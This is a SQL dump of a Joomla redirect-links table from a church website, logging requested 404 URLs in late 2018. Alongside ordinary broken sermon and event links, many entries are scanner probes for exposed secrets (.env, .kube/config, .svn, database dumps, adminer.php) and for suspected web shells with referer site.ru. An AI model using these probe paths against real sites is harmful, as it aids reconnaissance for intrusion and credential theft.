(9812, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=766&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-25 15:02:44', '0000-00-00 00:00:00', 301),
(9813, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=440&task=calendar&month=5&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-25 15:02:48', '0000-00-00 00:00:00', 301),
(9814, 'https://142.4.21.132/admin//config.php', NULL, '', '', 4, 0, '2018-10-25 15:24:57', '0000-00-00 00:00:00', 301),
(9815, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=544', NULL, '', '', 1, 0, '2018-10-26 14:00:05', '0000-00-00 00:00:00', 301),
(9816, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=54&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-26 14:01:28', '0000-00-00 00:00:00', 301),
(9817, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming?id=422', NULL, '', '', 1, 0, '2018-10-26 14:07:57', '0000-00-00 00:00:00', 301),
(9818, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=998&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-26 14:14:26', '0000-00-00 00:00:00', 301),
(9819, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=828&task=calendar&month=4&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-26 14:25:53', '0000-00-00 00:00:00', 301),
(9820, 'https://lifeoasisinternationalchurch.org/component/users/?view=606&itemid=101', NULL, '', '', 1, 0, '2018-10-26 14:26:08', '0000-00-00 00:00:00', 301),
(9821, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=496&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-26 14:27:59', '0000-00-00 00:00:00', 301),
(9822, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=892', NULL, '', '', 1, 0, '2018-10-26 14:29:08', '0000-00-00 00:00:00', 301),
(9823, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=574&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-26 14:30:41', '0000-00-00 00:00:00', 301),
(9824, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=700', NULL, '', '', 1, 0, '2018-10-26 14:33:08', '0000-00-00 00:00:00', 301),
(9825, 'https://lifeoasisinternationalchurch.org/streaming/prvate', NULL, '', '', 1, 0, '2018-10-27 07:56:06', '0000-00-00 00:00:00', 301),
(9826, 'https://lifeoasisinternationalchurch.org/privatelive-streaming', NULL, '', '', 1, 0, '2018-10-27 08:15:45', '0000-00-00 00:00:00', 301),
(9827, 'https://lifeoasisinternationalchurch.org/resources/live-streaming/ private', NULL, '', '', 1, 0, '2018-10-27 08:42:16', '0000-00-00 00:00:00', 301),
(9828, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/20-army-of-the-lord-3', NULL, '', '', 4, 0, '2018-10-27 17:18:47', '0000-00-00 00:00:00', 301),
(9829, 'https://lifeoasisinternationalchurch.org/36-prayer-a-fasting-day-27', NULL, '', '', 3, 0, '2018-10-27 17:56:14', '0000-00-00 00:00:00', 301),
(9830, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=3_mfzcfp-gw', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-27 21:08:16', '0000-00-00 00:00:00', 301),
(9831, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=tswb89yqvfk', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 3, 0, '2018-10-28 06:30:38', '0000-00-00 00:00:00', 301),
(9832, 'https://lifeoasisinternationalchurch.org/.kube/config', NULL, '', '', 1, 0, '2018-10-29 14:47:31', '0000-00-00 00:00:00', 301),
(9833, 'https://www.lifeoasisinternationalchurch.org/.kube/config', NULL, '', '', 1, 0, '2018-10-29 14:47:32', '0000-00-00 00:00:00', 301),
(9834, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181109\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"5cd4ae53173c19d2c6b031b431e5523a\",\"device_no\":\"ceb6496611912284ed706e283af4ba50\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181030141054\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1540879854192&sign=', NULL, '', '', 1, 0, '2018-10-30 06:10:53', '0000-00-00 00:00:00', 301),
(9835, 'https://lifeoasisinternationalchurch.org/seos.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-10-30 17:15:35', '0000-00-00 00:00:00', 301),
(9836, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=s6dhj9clm2c', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-10-30 20:58:49', '0000-00-00 00:00:00', 301),
(9837, 'https://lifeoasisinternationalchurch.org/index.php/user-profile?view=registration', NULL, '', '', 1, 0, '2018-11-03 16:54:22', '0000-00-00 00:00:00', 301),
(9838, 'https://142.4.21.132/alexa', NULL, '', '', 1, 0, '2018-11-04 03:47:02', '0000-00-00 00:00:00', 301),
(9839, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181114\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"0ab6befe49209633f0a0dab775f99c29\",\"device_no\":\"26c0a75d6d3da7527e21f89294139bdc\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181104143934\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1541313574467&sign=', NULL, '', '', 1, 0, '2018-11-04 06:39:34', '0000-00-00 00:00:00', 301),
(9840, 'https://www.lifeoasisinternationalchurch.org//configs.php', NULL, 'http://www.lifeoasisinternationalchurch.org//configs.php', '', 1, 0, '2018-11-06 08:40:01', '0000-00-00 00:00:00', 301),
(9841, 'https://lifeoasisinternationalchurch.org/.svn/', NULL, '', '', 1, 0, '2018-11-07 02:58:26', '0000-00-00 00:00:00', 301),
(9842, 'https://lifeoasisinternationalchurch.org/system/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627', NULL, '', '', 1, 0, '2018-11-07 07:30:31', '0000-00-00 00:00:00', 301),
(9843, 'https://lifeoasisinternationalchurch.org/system/storage/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627', NULL, '', '', 1, 0, '2018-11-07 13:20:16', '0000-00-00 00:00:00', 301),
(9844, 'https://142.4.21.132/polycom', NULL, '', '', 1, 0, '2018-11-08 07:01:21', '0000-00-00 00:00:00', 301),
(9845, 'https://142.4.21.132/snom', NULL, '', '', 1, 0, '2018-11-09 00:00:30', '0000-00-00 00:00:00', 301),
(9846, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181119\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"68babe4ae87235dadfe0cac078653cc5\",\"device_no\":\"a2abd33a0d88f1f55f4c58aae43dd4e2\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181109142035\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1541744435537&sign=', NULL, '', '', 1, 0, '2018-11-09 06:20:34', '0000-00-00 00:00:00', 301),
(9847, 'https://lifeoasisinternationalchurch.org/bea_wls_deployment_internal', NULL, '', '', 6, 0, '2018-11-10 01:54:52', '0000-00-00 00:00:00', 301),
(9848, 'https://lifeoasisinternationalchurch.org/accesson.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-11-10 09:44:38', '0000-00-00 00:00:00', 301),
(9849, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/29/34', NULL, '', '', 3, 0, '2018-11-10 16:31:38', '0000-00-00 00:00:00', 301),
(9850, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/30/34', NULL, '', '', 3, 0, '2018-11-10 16:31:42', '0000-00-00 00:00:00', 301),
(9851, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/31/34', NULL, '', '', 3, 0, '2018-11-10 16:31:47', '0000-00-00 00:00:00', 301),
(9852, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/01/34', NULL, '', '', 3, 0, '2018-11-10 16:31:51', '0000-00-00 00:00:00', 301),
(9853, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/02/34', NULL, '', '', 3, 0, '2018-11-10 16:31:57', '0000-00-00 00:00:00', 301),
(9854, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/03/34', NULL, '', '', 3, 0, '2018-11-10 16:32:02', '0000-00-00 00:00:00', 301),
(9855, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/04/34', NULL, '', '', 3, 0, '2018-11-10 16:32:07', '0000-00-00 00:00:00', 301),
(9856, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/05/34', NULL, '', '', 3, 0, '2018-11-10 16:32:11', '0000-00-00 00:00:00', 301),
(9857, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/06/34', NULL, '', '', 3, 0, '2018-11-10 16:32:14', '0000-00-00 00:00:00', 301),
(9858, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/07/34', NULL, '', '', 3, 0, '2018-11-10 16:32:20', '0000-00-00 00:00:00', 301),
(9859, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/08/34', NULL, '', '', 3, 0, '2018-11-10 16:32:24', '0000-00-00 00:00:00', 301),
(9860, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/09/34', NULL, '', '', 3, 0, '2018-11-10 16:32:28', '0000-00-00 00:00:00', 301),
(9861, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/17/34', NULL, '', '', 3, 0, '2018-11-10 16:32:33', '0000-00-00 00:00:00', 301),
(9862, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/19/34', NULL, '', '', 3, 0, '2018-11-10 16:32:40', '0000-00-00 00:00:00', 301),
(9863, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/20/34', NULL, '', '', 3, 0, '2018-11-10 16:32:45', '0000-00-00 00:00:00', 301),
(9864, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/07/15/34', NULL, '', '', 3, 0, '2018-11-10 16:32:49', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(9865, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2003/12/07/34', NULL, '', '', 3, 0, '2018-11-10 16:32:53', '0000-00-00 00:00:00', 301),
(9866, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2011/02/19/34', NULL, '', '', 3, 0, '2018-11-10 16:33:04', '0000-00-00 00:00:00', 301),
(9867, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2011/02/20/34', NULL, '', '', 3, 0, '2018-11-10 16:33:08', '0000-00-00 00:00:00', 301),
(9868, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2011/02/21/34', NULL, '', '', 3, 0, '2018-11-10 16:33:12', '0000-00-00 00:00:00', 301),
(9869, 'https://www.lifeoasisinternationalchurch.org/index.php/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2018-11-10 16:33:48', '0000-00-00 00:00:00', 301),
(9870, 'https://www.lifeoasisinternationalchurch.org/index.php/branches/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2018-11-10 16:33:52', '0000-00-00 00:00:00', 301),
(9871, 'https://www.lifeoasisinternationalchurch.org/index.php/partnership/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2018-11-10 16:34:01', '0000-00-00 00:00:00', 301),
(9872, 'https://lifeoasisinternationalchurch.org/adfs/ls/idpinitiatedsignon', NULL, '', '', 1, 0, '2018-11-10 19:49:47', '0000-00-00 00:00:00', 301),
(9873, 'https://www.lifeoasisinternationalchurch.org/adfs/ls/idpinitiatedsignon', NULL, '', '', 1, 0, '2018-11-10 21:47:44', '0000-00-00 00:00:00', 301),
(9874, 'https://music.lifeoasisinternationalchurch.org/adfs/ls/idpinitiatedsignon', NULL, '', '', 1, 0, '2018-11-10 23:51:07', '0000-00-00 00:00:00', 301),
(9875, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/14-sample-content-3', NULL, '', '', 4, 0, '2018-11-11 02:56:01', '0000-00-00 00:00:00', 301),
(9876, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/15-sample-content-4', NULL, '', '', 4, 0, '2018-11-11 02:56:08', '0000-00-00 00:00:00', 301),
(9877, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/16-sample-content-5', NULL, '', '', 4, 0, '2018-11-11 02:56:15', '0000-00-00 00:00:00', 301),
(9878, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/17-sample-content-6', NULL, '', '', 4, 0, '2018-11-11 02:56:20', '0000-00-00 00:00:00', 301),
(9879, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/18-sample-content-7', NULL, '', '', 4, 0, '2018-11-11 02:56:24', '0000-00-00 00:00:00', 301),
(9880, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/19-sample-content-8', NULL, '', '', 4, 0, '2018-11-11 02:56:29', '0000-00-00 00:00:00', 301),
(9881, 'https://lifeoasisinternationalchurch.org/component/content/article/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 4, 0, '2018-11-11 02:56:51', '0000-00-00 00:00:00', 301),
(9882, 'https://lifeoasisinternationalchurch.org/component/content/article/2-uncategorised/58-private', NULL, '', '', 4, 0, '2018-11-11 02:57:06', '0000-00-00 00:00:00', 301),
(9883, 'https://lifeoasisinternationalchurch.org/component/content/article/2-uncategorised/60-destinytv', NULL, '', '', 4, 0, '2018-11-11 02:57:11', '0000-00-00 00:00:00', 301),
(9884, 'https://lifeoasisinternationalchurch.org/component/content/category/12-sample-content', NULL, '', '', 4, 0, '2018-11-11 02:57:15', '0000-00-00 00:00:00', 301),
(9885, 'https://lifeoasisinternationalchurch.org/backups/', NULL, '', '', 2, 0, '2018-11-11 09:02:24', '0000-00-00 00:00:00', 301),
(9886, 'https://lifeoasisinternationalchurch.org/dump/', NULL, '', '', 1, 0, '2018-11-11 09:49:11', '0000-00-00 00:00:00', 301),
(9887, 'https://lifeoasisinternationalchurch.org/dumps/', NULL, '', '', 1, 0, '2018-11-11 10:36:32', '0000-00-00 00:00:00', 301),
(9888, 'https://lifeoasisinternationalchurch.org/old/', NULL, '', '', 4, 0, '2018-11-11 11:23:42', '0000-00-00 00:00:00', 301),
(9889, 'https://lifeoasisinternationalchurch.org/db/', NULL, '', '', 5, 0, '2018-11-11 12:10:47', '0000-00-00 00:00:00', 301),
(9890, 'https://lifeoasisinternationalchurch.org/mysql/', NULL, '', '', 2, 0, '2018-11-11 12:57:44', '0000-00-00 00:00:00', 301),
(9891, 'https://lifeoasisinternationalchurch.org/database/', NULL, '', '', 2, 0, '2018-11-11 14:31:07', '0000-00-00 00:00:00', 301),
(9892, 'https://www.lifeoasisinternationalchurch.org/resources/live-stre', NULL, '', '', 2, 0, '2018-11-11 22:34:19', '0000-00-00 00:00:00', 301),
(9893, 'https://www.lifeoasisinternationalchurch.org/resources/live-privatestreaming', NULL, '', '', 2, 0, '2018-11-11 22:58:31', '0000-00-00 00:00:00', 301),
(9894, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/53-testing?tmpl=component&print=1&page=', NULL, '', '', 7, 0, '2018-11-12 00:54:33', '0000-00-00 00:00:00', 301),
(9895, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 4, 0, '2018-11-12 00:56:01', '0000-00-00 00:00:00', 301),
(9896, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 4, 0, '2018-11-12 00:56:08', '0000-00-00 00:00:00', 301),
(9897, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 4, 0, '2018-11-12 00:56:23', '0000-00-00 00:00:00', 301),
(9898, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 4, 0, '2018-11-12 00:56:30', '0000-00-00 00:00:00', 301),
(9899, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 4, 0, '2018-11-12 00:56:37', '0000-00-00 00:00:00', 301),
(9900, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 4, 0, '2018-11-12 00:56:43', '0000-00-00 00:00:00', 301),
(9901, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/our-belief', NULL, '', '', 11, 0, '2018-11-12 00:57:25', '0000-00-00 00:00:00', 301),
(9902, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/our-belief/18-loic/50-young-achievers', NULL, '', '', 11, 0, '2018-11-12 00:57:32', '0000-00-00 00:00:00', 301),
(9903, 'https://lifeoasisinternationalchurch.org/index.php/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2018-11-12 00:58:41', '0000-00-00 00:00:00', 301),
(9904, 'https://lifeoasisinternationalchurch.org/index.php/template-info/media-outreach/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2018-11-12 00:58:56', '0000-00-00 00:00:00', 301),
(9905, 'https://lifeoasisinternationalchurch.org/index.php/template-info/mimmp/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2018-11-12 00:59:10', '0000-00-00 00:00:00', 301),
(9906, 'https://lifeoasisinternationalchurch.org/index.php/template-info/music/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2018-11-12 00:59:25', '0000-00-00 00:00:00', 301),
(9907, 'https://lifeoasisinternationalchurch.org/index.php/template-info/outreach/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2018-11-12 00:59:39', '0000-00-00 00:00:00', 301),
(9908, 'https://lifeoasisinternationalchurch.org/resources/baptism/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2018-11-12 01:01:47', '0000-00-00 00:00:00', 301),
(9909, 'https://lifeoasisinternationalchurch.org/resources/stream/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2018-11-12 01:02:23', '0000-00-00 00:00:00', 301),
(9910, 'https://lifeoasisinternationalchurch.org/sherwoods.php', NULL, 'http://site.ru', '', 2, 0, '2018-11-13 12:51:05', '0000-00-00 00:00:00', 301),
(9911, 'https://lifeoasisinternationalchurch.org/wp-backup.php', NULL, 'http://site.ru', '', 4, 0, '2018-11-13 14:00:35', '0000-00-00 00:00:00', 301),
(9912, 'https://lifeoasisinternationalchurch.org/mixi.php', NULL, 'http://site.ru', '', 1, 0, '2018-11-13 17:45:16', '0000-00-00 00:00:00', 301),
(9913, 'https://142.4.21.132/hello', NULL, '', '', 1, 0, '2018-11-13 21:50:41', '0000-00-00 00:00:00', 301),
(9914, 'https://lifeoasisinternationalchurch.org/popup-pomo.php', NULL, 'http://site.ru', '', 2, 0, '2018-11-14 04:23:02', '0000-00-00 00:00:00', 301),
(9915, 'https://lifeoasisinternationalchurch.org/wss.php', NULL, 'http://site.ru', '', 3, 0, '2018-11-14 05:26:19', '0000-00-00 00:00:00', 301),
(9916, 'https://lifeoasisinternationalchurch.org/wp-logout.php', NULL, 'http://site.ru', '', 3, 0, '2018-11-14 06:08:52', '0000-00-00 00:00:00', 301),
(9917, 'https://lifeoasisinternationalchurch.org/pasts.php', NULL, 'http://site.ru', '', 6, 0, '2018-11-14 11:00:14', '0000-00-00 00:00:00', 301),
(9918, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=rj8dfxdv_sw', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-11-14 15:47:54', '0000-00-00 00:00:00', 301),
(9919, 'https://lifeoasisinternationalchurch.org/rois.php', NULL, 'http://site.ru', '', 8, 0, '2018-11-14 16:41:59', '0000-00-00 00:00:00', 301),
(9920, 'https://lifeoasisinternationalchurch.org/cgi.php', NULL, 'http://site.ru', '', 5, 0, '2018-11-14 18:40:15', '0000-00-00 00:00:00', 301),
(9921, 'https://lifeoasisinternationalchurch.org/meuhy.php', NULL, 'http://site.ru', '', 4, 0, '2018-11-14 18:42:06', '0000-00-00 00:00:00', 301),
(9922, 'https://lifeoasisinternationalchurch.org/error.php', NULL, 'http://site.ru', '', 2, 0, '2018-11-15 02:33:08', '0000-00-00 00:00:00', 301),
(9923, 'https://lifeoasisinternationalchurch.org/hx.php', NULL, 'http://site.ru', '', 5, 0, '2018-11-15 03:20:25', '0000-00-00 00:00:00', 301),
(9924, 'https://lifeoasisinternationalchurch.org/wp-press.php', NULL, 'http://site.ru', '', 4, 0, '2018-11-15 07:07:30', '0000-00-00 00:00:00', 301),
(9925, 'https://lifeoasisinternationalchurch.org/wp-organizer.php', NULL, 'http://site.ru', '', 3, 0, '2018-11-15 08:42:00', '0000-00-00 00:00:00', 301),
(9926, 'https://lifeoasisinternationalchurch.org/.env/', NULL, '', '', 2, 0, '2018-11-15 16:23:53', '0000-00-00 00:00:00', 301),
(9927, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 3, 0, '2018-11-15 18:59:29', '0000-00-00 00:00:00', 301),
(9928, 'https://lifeoasisinternationalchurch.org/ministries/wimmp/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2018-11-16 05:13:15', '0000-00-00 00:00:00', 301),
(9929, 'https://142.4.21.132/nmaplowercheck1542359446', NULL, '', '', 1, 0, '2018-11-16 09:10:44', '0000-00-00 00:00:00', 301),
(9930, 'https://www.lifeoasisinternationalchurch.org/asom2018/index.php/accommodation', NULL, '', '', 1, 0, '2018-11-17 07:54:53', '0000-00-00 00:00:00', 301),
(9931, 'https://lifeoasisinternationalchurch.org/sp', NULL, '', '', 1, 0, '2018-11-18 10:43:48', '0000-00-00 00:00:00', 301),
(9932, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181129\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"1df67dfcfec1a262811cdae0cc91fff9\",\"device_no\":\"e67809d42895c3cdbed74f2a99996f1d\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181119142216\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1542608536707&sign=', NULL, '', '', 1, 0, '2018-11-19 06:22:15', '0000-00-00 00:00:00', 301),
(9933, 'https://lifeoasisinternationalchurch.org/null', NULL, '', '', 4, 0, '2018-11-23 09:21:11', '0000-00-00 00:00:00', 301),
(9934, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181204\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"fc9b32ddfd3c15bf8923d0c4340a0334\",\"device_no\":\"454d4bc82ba43243ebed6827cdcdca71\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181124143818\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1543041498127&sign=', NULL, '', '', 1, 0, '2018-11-24 06:38:17', '0000-00-00 00:00:00', 301),
(9935, 'https://www.lifeoasisinternationalchurch.org/streamingthere', NULL, '', '', 1, 0, '2018-11-25 09:06:23', '0000-00-00 00:00:00', 301),
(9936, 'https://www.lifeoasisinternationalchurch.org/streaming*', NULL, '', '', 3, 0, '2018-11-25 09:18:28', '0000-00-00 00:00:00', 301),
(9937, 'https://lifeoasisinternationalchurch.org/resources/youtube', NULL, '', '', 1, 0, '2018-11-25 12:38:30', '0000-00-00 00:00:00', 301),
(9938, 'https://lifeoasisinternationalchurch.org/mysql.php', NULL, 'http://lifeoasisinternationalchurch.org/mysql.php', '', 1, 0, '2018-11-28 04:41:17', '0000-00-00 00:00:00', 301),
(9939, 'https://lifeoasisinternationalchurch.org/rsources/live-streaming', NULL, '', '', 1, 0, '2018-11-28 16:09:12', '0000-00-00 00:00:00', 301),
(9940, 'https://www.lifeoasisinternationalchurch.org/photogallery', NULL, '', '', 8, 0, '2018-11-28 23:38:46', '0000-00-00 00:00:00', 301),
(9941, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181209\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"5e4b5aab02e2cf30ffa791a5ac1de89c\",\"device_no\":\"c72f6ede99aaf52e666c65464e9a0f49\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181129141144\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1543471904684&sign=', NULL, '', '', 1, 0, '2018-11-29 06:11:43', '0000-00-00 00:00:00', 301),
(9942, 'https://lifeoasisinternationalchurch.org/_adminer.php', NULL, 'http://lifeoasisinternationalchurch.org/_adminer.php', '', 2, 0, '2018-11-29 18:07:36', '0000-00-00 00:00:00', 301),
(9943, 'https://lifeoasisinternationalchurch.org/priivatestreaming', NULL, '', '', 1, 0, '2018-11-30 23:32:48', '0000-00-00 00:00:00', 301),
(9944, 'https://www.lifeoasisinternationalchurch.org/resources/live', NULL, '', '', 2, 0, '2018-12-01 08:27:04', '0000-00-00 00:00:00', 301),
(9945, 'https://www.lifeoasisinternationalchurch.org/privatevv', NULL, '', '', 1, 0, '2018-12-01 13:37:47', '0000-00-00 00:00:00', 301),
(9946, 'https://lifeoasisinternationalchurch.org/k2/', NULL, 'https://lifeoasisinternationalchurch.org/k2/', '', 1, 0, '2018-12-02 22:49:13', '0000-00-00 00:00:00', 301),
(9947, 'https://lifeoasisinternationalchurch.org/freshrdp.com.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-03 02:58:14', '0000-00-00 00:00:00', 301),
(9948, 'https://lifeoasisinternationalchurch.org/conf.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-03 09:00:34', '0000-00-00 00:00:00', 301),
(9949, 'https://lifeoasisinternationalchurch.org/layouts/joomla/system/mark.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-03 13:00:22', '0000-00-00 00:00:00', 301),
(9950, 'https://lifeoasisinternationalchurch.org/language/patcher.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-03 17:45:26', '0000-00-00 00:00:00', 301),
(9951, 'https://lifeoasisinternationalchurch.org/do.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-04 00:36:57', '0000-00-00 00:00:00', 301),
(9952, 'https://lifeoasisinternationalchurch.org/mod.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-04 04:52:52', '0000-00-00 00:00:00', 301),
(9953, 'https://lifeoasisinternationalchurch.org/models.php', NULL, 'http://site.ru', '', 1, 0, '2018-12-04 12:33:58', '0000-00-00 00:00:00', 301),
